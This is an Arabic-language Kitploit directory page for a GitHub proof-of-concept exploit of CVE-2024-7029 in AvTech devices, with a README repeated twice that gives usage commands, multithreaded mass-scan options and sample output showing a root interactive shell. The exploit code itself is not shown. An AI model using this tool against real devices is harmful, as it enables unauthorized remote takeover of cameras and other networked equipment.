Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-7029 — استغلال إثبات المفهوم (PoC) لثغرة CVE-2024-7029 المكتشفة في أجهزة AvTech، مما يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE) | Kitploit
أدوات/GitHubGitHub/geniuszly/cve-2024-7029
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubgeniuszly/cve-2024-7029

CVE-2024-7029

استغلال إثبات المفهوم (PoC) لثغرة CVE-2024-7029 المكتشفة في أجهزة AvTech، مما يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE)

عرض المستودع
9منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

EN

GenAvTechRCEExploit هي أداة استغلال PoC لثغرة CVE-2024-7029 الموجودة في أجهزة AvTech، مما يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE). يمكن لهذه الأداة فحص الأجهزة المعرّضة للثغرة وتنفيذ الأوامر عليها بشكل تفاعلي.

الميزات

  • اكتشاف الثغرات: التحقق مما إذا كانت أجهزة AvTech معرّضة لثغرة RCE.
  • صدفة تفاعلية: تنفيذ الأوامر على الجهاز الهدف عبر صدفة تفاعلية.
  • فحص متعدد الخيوط: فحص عدة أهداف بالتزامن باستخدام تعدد الخيوط.
  • تنفيذ الحمولة: استغلال الأهداف بإرسال حمولات مُصمَّمة خصيصًا لتنفيذ الأوامر عن بُعد.

المتطلبات

  • Python 3.7+
  • مكتبة requests
  • مكتبة prompt_toolkit
  • مكتبة alive_progress

ثبّت المكتبات المطلوبة باستخدام:

root@kitploit:~
pip install -r requirements.txt

الاستخدام

فحص هدف واحد

للتحقق من وجود الثغرة في هدف واحد وبدء صدفة تفاعلية:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

استبدل <target_url> بعنوان URL الفعلي للجهاز الهدف.

فحص عدة أهداف

لفحص عدة أهداف مدرجة في ملف (عنوان URL واحد في كل سطر):

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

استبدل <file_path> بمسار ملفك الذي يحتوي على عناوين URL للأهداف.

الخيوط

يمكنك تحديد عدد الخيوط المستخدمة في الفحص باستخدام الخيار -t:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

افتراضيًا، يتم ضبط عدد الخيوط على 10.

مثال

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20

RU

GenAvTechRCEExploit - استغلال لثغرة CVE-2024-7029 في أجهزة AvTech، مما يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE). يمكن لهذه الأداة فحص الأجهزة المعرّضة للثغرة وتنفيذ الأوامر عليها في الوضع التفاعلي.

الميزات

  • اكتشاف الثغرات: التحقق من تعرّض أجهزة AvTech لثغرة RCE.
  • صدفة تفاعلية: تنفيذ الأوامر على الجهاز الهدف عبر صدفة تفاعلية.
  • فحص متعدد الخيوط: فحص عدة أهداف في الوقت نفسه باستخدام تعدد الخيوط.
  • تنفيذ الحمولة: استغلال الأهداف بإرسال حمولة مُصمَّمة خصيصًا لتنفيذ الأوامر عن بُعد.

المتطلبات

  • Python 3.7+
  • مكتبة requests
  • مكتبة prompt_toolkit
  • مكتبة alive_progress

يمكن تثبيت المكتبات المطلوبة باستخدام:

root@kitploit:~
pip install -r requirements.txt

الاستخدام

فحص هدف واحد

للتحقق من وجود الثغرة في هدف واحد وبدء صدفة تفاعلية:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

استبدل <target_url> بعنوان URL الحقيقي للجهاز الهدف.

فحص عدة أهداف

لفحص عدة أهداف محددة في ملف (عنوان URL واحد في كل سطر):

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

استبدل <file_path> بمسار الملف الذي يحتوي على عناوين URL للأهداف.

الخيوط

يمكنك تحديد عدد الخيوط لاستخدامها في الفحص باستخدام الخيار -t:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

افتراضيًا، عدد الخيوط مضبوط على 10.

مثال

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
تنزيل الأداة